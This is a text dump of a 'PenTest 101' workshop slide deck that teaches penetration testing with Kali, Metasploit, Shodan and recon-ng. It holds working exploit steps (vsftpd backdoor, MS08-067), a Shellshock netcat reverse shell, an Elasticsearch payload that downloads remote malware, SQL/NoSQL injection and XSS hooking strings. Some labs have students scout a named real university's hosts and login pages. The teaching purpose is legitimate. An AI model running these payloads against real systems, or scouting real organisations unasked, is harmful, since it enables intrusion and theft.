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PenTest 101

PenTest 101

活動名稱:SWALLOW - Project Abyss 2021 Winter Workshop
課程名稱:PenTest 101


July 28, 2021

Other Decks in Technology


  1. # whoami • CSTI Servitor • Member of NISRA, NTUST

    Hack • Founder of SIRLA, Project Abyss • HITCON Hackdoor Instructor • My blog: https://nightcatv.github.io 2
  2. 7

  3. 8

  4. 9

  5. 12

  6. 13

  7. 14

  8. 15

  9. 16

  10. kali : kali 17 • Startup Kali Linux $ sudo

    passwd • Change root password root : [password] • Login with root
  11. # apt update 18 • Update Kali Linux # apt

    upgrade • Upgrade Kali Linux
  12. 20

  13. 21

  14. 27

  15. 30 • Simple to learn, but hard to be expert

    • Attack with application layer • Classical attack • XSS • SQL Injection
  16. 31

  17. 33 • Try to control the program • Need privilege

    escalation to control the computer
  18. Technical Term Vulnerability • A weakness which can be exploited

    by a threat actor, such as an attacker, to cross privilege boundaries within a computer system. Attack Surface • The attack surface of a software environment is the sum of the different points where an unauthorized user can try to enter data to or extract data from an environment. CVE • Common Vulnerabilities and Exposures CVSS • Common Vulnerability Scoring System 35
  19. About Penetration Test • A penetration test, also know as

    pentest, is a simulation of cyber attack against the computer system to check for exploitable vulnerability. • Hardware • Website • Information system • Other equipment 41
  20. About Penetration Test • PTES (Penetration Test Execution Standard) defined

    the following main section • Pre-engagement Interactions • Intelligence Gathering • Threat Modeling • Vulnerability Analysis • Exploitation • Post Exploitation • Reporting 42
  21. Pre-engagement Interactions • Present and Explain the tools and techniques

    available • The information within this section is the result of the many years of combined experience of some of the most successful penetration testers in the world 43
  22. Intelligence Gathering • Provide a standard designed specifically for the

    pentester performing reconnaissance against a target. • The intelligence gathering levels are currently split into three categories 44
  23. Intellegnce Gathering Level • Level 1 • Can be obtained

    almost entirely by automated tools • Level 2 • Using automated tools from level 1 and some manual analysis • Level 3 • Think cultivating relationships on SocNet, heavy analysis, deep understanding of business relationships, most likely a large number of hours to accomplish the gathering and correlation
  24. Threat Modeling • Required for correct execution of a penetration

    testing • The model used be consistent in terms of its representation of threats, their capabilities, their qualifications • Per the organization being tested • The ability to repeatedly be applied too future test with the same results 46
  25. High level threat modeling process • Gather relevant document •

    Identify and categorize primary and secondary assets • Identify and categorize threats and threat communities • Map threat communities against primary and secondary assets
  26. Vulnerability Analysis • Discovering flaws in systems and applications which

    can be leveraged by an attacker • Host • Service misconfiguration • Insecure application design 48
  27. Exploitation • Focuses solely on establishing access to a system

    or resource by bypassing security restrictions • Should be well planned and precision strike 49
  28. Post Exploitation • Determine the value of machine compromised •

    By the sensitivity of the data stored on it • The machine usefulness in further compromising • Maintain control of the machine for later use 50
  29. Phases of post exploitation • Understanding the victim • Privilege

    escalation • Cleaning tracks and staying undetected • Collecting system information and data • Setting up backdooring and rootkits • Pivoting to penetrate internal networks
  30. Kali Linux • Debian-derived Linux distribution • Designed for •

    Digital forensics • Penetration testing 54
  31. Metasploit • Provides information about security vulnerabilities and aids in

    penetration testing and IDS signature development 55
  32. 56 Core Command s ============ = Command Descriptio n -------

    ---------- - ? Help men u banner Display an awesome metasploit banne r cd Change the current working director y color Toggle colo r connect Communicate with a hos t debug Display information useful for debuggin g exit Exit the consol e features Display the list of not yet released features that can be opted in t o get Gets the value of a context-specific variabl e getg Gets the value of a global variabl e grep Grep the output of another comman d help Help men u history Show command histor y load Load a framework plugi n quit Exit the consol e repeat Repeat a list of command s route Route traffic through a sessio n save Saves the active datastore s sessions Dump session listings and display information about session s set Sets a context-specific variable to a valu e setg Sets a global variable to a valu e sleep Do nothing for the specified number of second s spool Write console output into a file as well the scree n threads View and manipulate background thread s tips Show a list of useful productivity tip s unload Unload a framework plugi n unset Unsets one or more context-specific variable s unsetg Unsets one or more global variable s version Show the framework and console library version numbers
  33. 57 Module Command s ============== = Command Descriptio n -------

    ---------- - advanced Displays advanced options for one or more module s back Move back from the current contex t clearm Clear the module stac k info Displays information about one or more module s listm List the module stac k loadpath Searches for and loads modules from a pat h options Displays global options or for one or more module s popm Pops the latest module off the stack and makes it activ e previous Sets the previously loaded module as the current modul e pushm Pushes the active or list of modules onto the module stac k reload_all Reloads all modules from all defined module path s search Searches module names and description s show Displays modules of a given type, or all module s use Interact with a module by name or search term/index
  34. Burp Suite • Essential manual tools • Intercept all requests

    and responses • Target site map • Automatic modification of responses 58
  35. Nmap • Nmap, network mapper • Free and open source

    • network discovery and security auditing 59
  36. BeEF • Short for the browser exploitation framework • A

    penetration testing tool that focuses on the web browser 62
  37. What is Shodan • A tool for searching devices connected

    to the internet • Common Usage: • Network Security • Market Research • Cyber Risk • Sanning IoT Devices • Tracking Ransomware 65
  38. 66

  39. 67

  40. # pip3 install shodan 69 • Install Shodan # shodan

    init <YOUR API Key> • Initialize
  41. Command 70 # shodan --help • Help Usage: shodan [OPTIONS]

    COMMAND [ARGS].. . Options : -h, --help Show this message and exit . Commands : alert Manage the network alerts for your accoun t convert Convert the given input data file into a different format . count Returns the number of results for a searc h data Bulk data access to Shoda n domain View all available information for a domai n download Download search results and save them in a compressed JSON.. . honeyscore Check whether the IP is a honeypot or not . host View all available information for an IP addres s info Shows general information about your accoun t init Initialize the Shodan command-lin e myip Print your external IP addres s org Manage your organization's access to Shoda n parse Extract information out of compressed JSON files . radar Real-Time Map of some results as Shodan finds them . scan Scan an IP/ netblock using Shodan . search Search the Shodan databas e stats Provide summary information about a search quer y stream Stream data in real-time . version Print version of this tool .
  42. Command 71 # shodan info • Information # shodan version

    • Version Information # shodan myip • Personal IP address
  43. Command 72 # shodan host • Host Information •

    Find the host information, such as • Location • Opened port • Organization • etc.
  44. Command 73 # shodan search -h • Search • Default

    output • IP • Port • Hostname • Data Usage: shodan search [OPTIONS] <search query > Search the Shodan databas e Options : --color / --no-colo r --fields TEXT List of properties to show in the search results . --limit INTEGER The number of search results that should be returned . Maximum: 100 0 --separator TEXT The separator between the properties of the searc h results . -h, --help Show this message and exit.
  45. 74

  46. 75

  47. Lab Task Find a Fu-Jen University machine • Hint: •

    Use Shodan • Command: host / search 76
  48. 77

  49. About Recon-NG • Passive search the open source information of

    an organization • IP address • Command Rule • Location • User • etc.
  50. About Recon-NG • This tool is classified into groups •

    Discovery • Exploitation • Import • Recon • Report
  51. Command 81 # recon-ng • Startup > workspaces create [workspace

    name] • Create workspace > workspaces list • Check workspace
  52. Command 82 > marketplace refresh • Refresh modules > marketplace

    search [theme] • Search modules > marketplace install xxx/xxx/xxx • Install modules
  53. Lab Task Install Modules • recon/domains-hosts/bing_domain_web • recon/domains-hosts/google_site_web • recon/domains-hosts/brute_hosts

    • recon/domains-hosts/netcraft • recon/hosts-hosts/resolve • recon/hosts-hosts/reverse_resolve • discovery/info_disclosure/interesting_files • recon/domains-contacts/whois_pocs • reporting/html 83
  54. Lab Task Find a Fu-Jen University machine and report it

    • Hint: • Use recon-ng • Use recon/domains-hosts/google_site_web • Use reporting/html 87
  55. Command 90 > modules load reporting/html • Load report module

    > run • Execution > options set CREATOR fju > options set CUSTOMER user • Set Creator and customer
  56. 92

  57. Google Hacking • Uses Google search and other Google application

    to find security holes in the configuration and computer code that websites are using 93
  58. 94

  59. Search Syntax allintext • Search for specific text contained on

    any web page allintitle • Search for specific text contained on any web page that will show pages that contain titles with X characters 95
  60. Search Syntax site • Show you the full list of

    all indexed URLs for the specified domain and subdomain inurl • The same as allinurl, but it is only useful for one single keyword 96
  61. Search Syntax filetype • Used to search for any kind

    of file extensions intitle • Used to search for various keywords inside the title intext • Useful to locate pages that contain certain characters or strings inside their text 97
  62. Lab Task Find a Fu-Jen University URL with login page

    • Hint: • Keyword: fju, login 98
  63. vsftpd • vsftpd, very secure ftp Daemon • The character

    who start up this service would be normal user • Any higher privilege commands are controlled by a special father program • Most command used in ftp has integrate into vsftpd 106
  64. Lab Task Create a file in the target host •

    Hint: • Use Metasploit • Use vsftpd Vulnerability 108
  65. # msfconsole 109 • Startup Metasploit > use exploit/unix/ftp/vsftpd_234_backdoor •

    Choose Vulnerability (exploit/unix/ftp/vsftpd_234_backdoor)> show options • Show Options of Vulnerability
  66. (exploit/unix/ftp/vsftpd_234_backdoor)> set RHOST [IP address] 110 • Set Metasploitable 2

    IP address (exploit/unix/ftp/vsftpd_234_backdoor)> exploit • Execute the Vulnerability
  67. > uname -a 111 • Show the System Information >

    touch [file_name] • Create a file with arbitrary name
  68. CVE-2008-4250 • The server service allows remote attackers to execute

    arbitrary code via a craft RPC request that triggers the overflow during path canonicalization • Windows 2000 SP4 • Windows XP SP2 and SP3 • Windows Server 2003 SP1 and SP2 • Windos Vista Gold and SP1 • Windows Server 2008 • Windows 7 Pre-Beta 113
  69. What is buffer overflow? 114 abcdefgh ij klmnop qrstuvwx yzzzzzzz

    abcdefga aaaaaaaa aaaaaaaa aaaaaaaa 8 8 16 8 8 16
  70. Lab Task Buffer Overflow to get the flag • Hint:

    • Read Source Code • Be care of struct 115
  71. > [any name] 117 • Input any username that doesn’t

    exist > 11111111111admin • Input 11 bits password with the following did
  72. CVE-2008-4250 • The server service allows remote attackers to execute

    arbitrary code via a craft RPC request that triggers the overflow during path canonicalization • Windows 2000 SP4 • Windows XP SP2 and SP3 • Windows Server 2003 SP1 and SP2 • Windos Vista Gold and SP1 • Windows Server 2008 • Windows 7 Pre-Beta 118
  73. What is RPC? • RPC, Remote Procedure Call • A

    computer program causes a procedure to execute in a different address space, which is coded as if it were a normal procedure call 119
  74. 120

  75. Lab Task Create a directory in the target host •

    Hint: • Use Metasploit • Use MS08-067 Vulnerability 121
  76. # msfconsole 122 • Startup Metasploit > search ms08-067 •

    Search Vulnerability > use exploit/windows/smb/ms08-067_netapi • Choose Vulnerability
  77. (exploit/windows/smb/ms08-067_netapi)> show options 123 • Show Option of Vulnerability (exploit/windows/smb/ms08-067_netapi)>

    set RHOST [IP address] • Set IP Address of Target Windows VM (exploit/windows/smb/ms08-067_netapi)> set LHOST [IP address] • Set IP Address of Kali Linux
  78. meterpreter> sysinfo 125 • Show the System Information meterpreter> mkdir

    [directory_name] • Create a directory with arbitrary name
  79. CVE-2014-0160 • The TLS and DTLS implementations in OpenSSL do

    not properly handle Heartbeat Extension packet • Allow remote attacker to obtain sensitive information from process memory via crafted packet that trigger buffer over-read 127
  80. What is OpenSSL? • A robust, commercial-grade, and full-feature toolkit

    for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols. 128
  81. 130

  82. 131

  83. 132

  84. 133

  85. CVE-2014-6271 • GNU Bash process trailing strings after function definitions

    in the values of environment variables • Vector: • sshd • mod_cgi • mod_cgid 137
  86. What is “Bash”? • A Unix shell written for the

    GNU Project as a free software replacement for the Bourne shell (sh) • Provide end users an interface to issue system command and execute scripts 138
  87. What is “Bash”? Environment variable 139 # echo $HOME /root

    # env | more COLORFGBG=15;0 COLORTERM=truecolor ...
  88. What is “Bash”? De fi ne bash function 140 #

    welcome() { echo “Hi, $USER” } # welcome Hi, root
  89. What is “Bash”? De fi ne environment variable 141 #

    export envvar = “echo \“Hi, $USER\”” # bash -c $envvar Hi, root
  90. How shellshock work? 142 • Bash incorrectly executes trailing commands

    imports a function definition stored into an environment variable () { :; };
  91. How shellshock work? 143 env x = ‘() { :;

    }; echo vulnerable’ bash -c “cat /etc/passwd” Legit function definition in BASH environment variable Injection of arbitrary OS command BASH command invoked with on-the-fly defined environment
  92. Shellshock Attack Vectors • RCE via Apache with mod_cgi, CGI

    scripts, Python, Perl • RCE on DHCP clients using Hostile DHCP Server • OpenSSH RCE / Privilege escalation
  93. Before we start Lab Task • Startup OWASPBWA virtual machine

    • Download scripts in kali 145 # git clone https://github.com/cheetz/icmpshock /opt/icmpshock
  94. Lab Task Make the target machine send ping packet to

    kali • Hint: • Use the script • Startup tcpdump 146
  95. # cd /opt/icmpshock 147 • Change directory # chmod +x

    icmpshock.py • Change authorization of the script
  96. # vi target_list.txt 148 • Modify the target list >

    [OWASPBWA IP] • Add target IP into the file at the first line
  97. # tcpdump -nni eth0 -e icmp[icmptype] == 8 149 •

    Startup tcpdump to monitor ICMP # python icmpshock.py [Kali Linux IP] target_list.txt • Startup script
  98. Lab Task Try to acquire the target shell • Hint:

    • Use the script • Modify the script at 72 to 73 lines 150
  99. # vi icmpshock.py 151 • Modify the script #Command =

    “/bin/ping -c1 ” + LISTENER • Comment the 72th line Command = “/bin/nc.tradition “ + LISTENER + “ 4444 -e /bin/bash” • Uncomment the 73th line and modify
  100. # nc -l -p 4444 152 • Startup nc #

    python icmpshock.py [Kali Linux IP] target_list.txt • Startup script
  101. CVE-2015-1427 • Elasticsearch engine allow remote attackers to bypass the

    sandbox protection mechanism and execute arbitrary shell commands via a crafted script. 154
  102. What is Elastic Search? • An search engine base on

    Lucene library • Developed in Java • It provides a distributed, multitenant-capable full text search engine • HTTP web interface • Schema-free JSON document 155
  103. Feature of Elastic Search _search • _search API endpoint is

    to allow user to submit groovy code in search query itself • Allow anybody to submit server-side code to get executed 156
  104. Feature of Elastic Search _search 157 {"query" : {"filtered": {

    "query": {"match_all": {}}}} , "script_fields": {"exp": { "script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/malware http://x.x.x.x/malware \").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null) {sb.append(str);sb.append(\"\r\n\");}sb.toString();" }}}
  105. How the sandbox works? • The functions and classes that

    are allowed by the sandbox are found in GroovySandboxExpressionChecker.java • The function isAuthorized takes in an expression and checks to see if it is allowed to be executed 158
  106. How the sandbox works? 159 if (expression instanceof MethodCallExpression) {

    MethodCallExpression mce = (MethodCallExpression) expression ; String methodName = mce.getMethodAsString() ; if (methodBlacklist.contains(methodName)) { return false ; } else if (methodName == null && mce.getMethod() instanceof GStringExpression) { // We do not allow GStrings for method invocation, they are a security risk return false ; } // snip }
  107. How the sandbox works? Condition 160 if (methodBlacklist.contains(methodName)) public static

    String[] defaultMethodBlacklist = new String[] { "getClass" , "wait" , "notify" , "notifyAll" , "finalize" };
  108. How the sandbox work? Condition 161 if (methodName == null

    && mce.getMethod() instanceof GStringExpression) • Method name is not null • Do not use a GStringExpression
  109. How the sandbox work? Restricts the packages 162 if (receiversWhiteList

    != null && !receiversWhiteList.contains(typeName)) { throw new SecurityException("Method calls not allowed on [" + typeName + "]") ; } else if (receiversBlackList != null && receiversBlackList.contains(typeName)) { throw new SecurityException("Method calls not allowed on [" + typeName + "]") ; }
  110. How the sandbox work? Restricts the packages 163 private final

    static String[] defaultReceiverWhitelist = new String [] { groovy.util.GroovyCollections.class.getName() , java.lang.Math.class.getName() , java.lang.Integer.class.getName(), "[I", "[[I", "[[[I" , //snip };
  111. Bypassing the sandbox with reflection Load the java.lang.Runtime 164 $

    curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\")"}}} ' { <snip > "hits" : { "total" : 8 , "max_score" : 1.0 , "hits" : [ { <snip > "fields" : { "myscript" : [ "class java.lang.Runtime" ] } } }}
  112. Before we start Lab Task • Startup ubuntu virtual machine

    • Login with root:root 165 # cd elasticsearch-1.4.1/bin # ./elasticsearch
  113. # chmod +x ./elastic_shell.py 168 • Add execution authorization #

    python ./elastic_shell.py [ElasticSearch IP address] • Startup exploit script
  114. What is SQL? • SQL, Structured Query Language • is

    used to communicate with a database • Common relational database management systems that use SQL • Oracle • Microsoft SQL Server • MariaDB • etc. 171
  115. Basic SQL Syntax 172 SELECT [column_name] FROM [table_name] WHERE [condition]

    Column Name in the specified table Table Name in the specified database Condition that judge whether the value is true or not
  116. SQL Syntax Example 173 SELECT user, pass FROM users_data WHERE

    user=vin Column Name in the specified table Table Name in the specified database Condition that judge whether the value is true or not
  117. What is SQL Injection? $user = $_GET['user']; $pass = $_GET['pass'];

    $res = mysql_query("SELECT * FROM users WHERE user='$user' AND pass='$pass'", $link); 174
  118. What is SQL Injection? SELECT * FROM users WHERE user='$user'

    AND pass='$pass' 175 SELECT * FROM users WHERE user='asdf' AND pass='asdf' user=asdf pass=asdf
  119. What is SQL Injection? SELECT * FROM users WHERE user='$user'

    AND pass='$pass' 176 SELECT * FROM users WHERE user=‘’ OR 2=2 -- ’ AND pass='asdf' user=‘ OR 2=2 -- pass=asdf
  120. 178

  121. 179

  122. 181

  123. 182

  124. 183

  125. SELECT * FROM accounts WHERE username=‘aaaa’' AND password='' 184 SELECT

    * FROM accounts WHERE username=‘’ OR 1=1 -- AND password='' Username = ‘ OR 1=1 --
  126. 185

  127. 186

  128. Lab Task Use sqlmap to inject target page • Target:

    [OWASPBWA IP]/mutillidae/index.php/? page=login.php • Hint: • Set “--data=“username=&password=&login-php-submit- button=Login”” 187
  129. 189

  130. 190

  131. 191

  132. SELECT * FROM accounts WHERE username=‘aaaa’’; 192 SELECT * FROM

    accounts WHERE username=‘‘ OR ‘’=‘'; Username = ‘ OR ‘’='
  133. 193

  134. 194

  135. 195

  136. 196

  137. SELECT * FROM accounts WHERE username=‘’ AND password=‘'; 197 SELECT

    * FROM accounts WHERE username=‘‘ OR ‘’=‘’ AND password=‘’ OR ‘’=‘'; Username = ‘ OR ‘’=‘ Password = ‘ OR ‘’=‘
  138. 198

  139. 199

  140. About NoSQL • Also named as “non-SQL” or “non-relational SQL”

    • Differ from traditional relational SQL database 201
  141. Scope Based on OWASP 2016 202 Database Type Ranking MongoDB

    Document store 5 Redis Key-value store 9 Memcached Key-value store 23 CouchDB Document store 26
  142. Basic Syntax Use MongoDB as example db.users.find ( {name: "duran"}

    , {name: 1, address: 1 } ).limit(5) Database Name Collection Name Query Projection Modifier 204
  143. What is NoSQL Injection? 205 { "username": { "$ne": "malicious@example.com"

    } , "password": { "$ne": "mymaliciouspassword" } } • An web application got a json filetype username and password
  144. What is NoSQL Injection? 206 Model.findOne(req.body ) // o r

    Model.findOne({ username: req.body.username, password: req.body.password });
  145. What is NoSQL Injection? 207 Model.findOne( { username: { $ne:

    "malicious@example.com" } , password: { $ne: "mymaliciouspassword" } });
  146. Known Attack Method Based on OWASP 2016 • Login bypass

    for MongoDB on PHP and NodeJS • String concatenation for JSON and scrip • Escaping flaws of drivers 208
  147. 210 OWASP Web Application Security Risk Top 10 (2013) 1

    Injection 2 Broken Authentication and Session Management 3 Cross-site Scripting (XSS) 4 Insecure Direct Object References 5 Security Miscon fi guration 6 Sensitive Data Exposure 7 Miss Function Level Access Control 8 Cross-site Request Forgery (CSRF) 9 Using Known Vulnerabilities Component 10 Unvalidated Redirects and Forwards OWASP Web Application Security Risk Top 10 (2017) 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities (XXE) 5 Broken Access Control 6 Security Miscon fi guration 7 Cross-site Scripting (XSS) 8 Insecure Deserialize 9 Using Component with Known Vulnerabilities 10 Insu ffi cient Logging & Monitoring
  148. About XSS • Cross-site scripting (XSS) is a web vulnerability

    that allows an attacker to compromise the interactions. • Normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform. 211
  149. XSS Type • Reflected XSS • The malicious script comes

    from the current HTTP request • Stored XSS • The malicious script comes from the website’s database • DOM-based XSS • The vulnerability exists in client-side code rather than server- side code
  150. What is reflected XSS? • The simplest variety of cross-site

    scripting. • An application data in an HTTP request and includes that data within the immediate response in unsafe way. 214
  151. http://insecure-website.com/search? term=<script>\* Bad stuff here… */</script> Search “<script>\* Bad stuff

    here… */</ script>” <p> You searched for: <script> \* Bad stuff here… */ </script> </p> 216
  152. What is stored XSS? • Also known as persistent or

    second-order XSS • When the application receive data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. 217
  153. Before we start Lab Task • Install BeEF Exploitation Framework

    221 # git clone https://github.com/beefproject/beef /opt/beef # cd /opt/beef # ./install # vi config.yaml > user: “beef” > passwd: “[any string]” • Change the default user and password
  154. Before we start Lab Task • Visit User Interface at authentication • Login with beef:beef • Visit hook.js 223
  155. 224

  156. Lab Task Use XSS to hook the malicious script •

    Target: [OWASPBWA IP]/owaspbricks • Hint: • See the source carefully to find out where the website past the text directory 225
  157. 226

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  162. 235